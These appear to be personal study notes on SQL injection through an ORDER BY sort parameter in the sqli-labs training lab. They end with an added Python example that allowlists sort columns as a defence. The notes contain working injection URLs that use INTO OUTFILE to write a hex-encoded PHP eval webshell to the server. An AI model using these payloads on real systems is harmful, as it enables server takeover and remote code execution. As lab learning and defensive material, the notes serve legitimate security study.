SQL injection notes (4)

I. Injecting into order by sort:

(1) union select cannot be used after order by sort; it produces the error:

Incorrect usage of UNION and ORDER BY

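(2) When the value is not wrapped in quotes, entering ?sort=111 gives an error, but I tried it and entering ?sort=111111111111111111111 returned normally instead. Very strange; noting it down.

(3) If sort is wrapped in quotes, the query returns results no matter what is inside the quotes;

Additional notes:

(1) left(string, num) returns the first num characters of string, counting from the left;

(2) right(string, num) returns the last num characters of string, counting from the right;

(3) lines terminated by 0x16string ends every row of the query result with string; the 0x16string can be replaced with a one-line webshell;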

http://127.0.0.1/Less-46/
?sort=1 into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-46\\1.php" 
lines terminated by 
0x3c3f70687020406576616c28245f504f53545b227777225d293b203f3e--+

Additional ways of writing a one-line webshell:
(1)
http://127.0.0.1/Less-1/?id=1' into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-1\\ydyy1.php" lines terminated by ''--+

(2)
http://127.0.0.1/Less-1/?id=1' and (select '') into outfile "D:\\sqli-labs\\sqli-labs-master\\Less-1\\ydyy1.php"--+

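(4) In SQL, asc sorts by the column in ascending order and desc sorts by it in descending order;

select * from users order by id desc; -- descending order
select * from users order by id asc; -- ascending order

(5) order by:

select * from users order by 1; -- sort by the first column
select * from users order by 2; -- sort by the second column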
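
The sort value in these notes reaches the statement as SQL text, and a bound parameter cannot name a column, so the fix for this position is an allowlist. The following is an added example, not code from the original notes or from sqli-labs: it uses Python's sqlite3 as a stand-in for the lab's MySQL, and the sample rows, function names and allowlist are assumptions.

```python
import sqlite3

# Constructed rows standing in for the lab's `users` table.
ROWS = [(1, "Dumb", "p1"), (2, "Angelina", "p2"), (3, "Batman", "p3")]

# Hypothetical allowlist: request value -> fixed SQL identifier.
# Positions are accepted too, since the notes sort with `order by 1`.
SORT_COLUMNS = {"1": "id", "2": "username", "id": "id", "username": "username"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def build_order_by(sort, direction="asc"):
    """Translate request values into fixed fragments; reject everything else."""
    column = SORT_COLUMNS.get(str(sort).strip().lower())
    keyword = DIRECTIONS.get(str(direction).strip().lower())
    if column is None or keyword is None:
        raise ValueError("unsupported sort parameter")
    return f"ORDER BY {column} {keyword}"


def list_users(db, sort, direction="asc"):
    # Only text from the allowlist is concatenated; the request value never is.
    sql = "SELECT id, username FROM users " + build_order_by(sort, direction)
    return db.execute(sql).fetchall()


def list_users_bound(db, sort):
    # Binding the value makes it a constant, like the quoted case in note (3):
    # the statement runs, but the rows are not ordered by the named column.
    sql = "SELECT id, username FROM users ORDER BY ?"
    return db.execute(sql, (sort,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(list_users(db, "2"))
    print(list_users(db, "id", "desc"))
    print(list_users_bound(db, "username"))
```

The bound variant is included to show why parameter binding alone does not give a working sort feature here, which is what pushes developers back to string concatenation.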
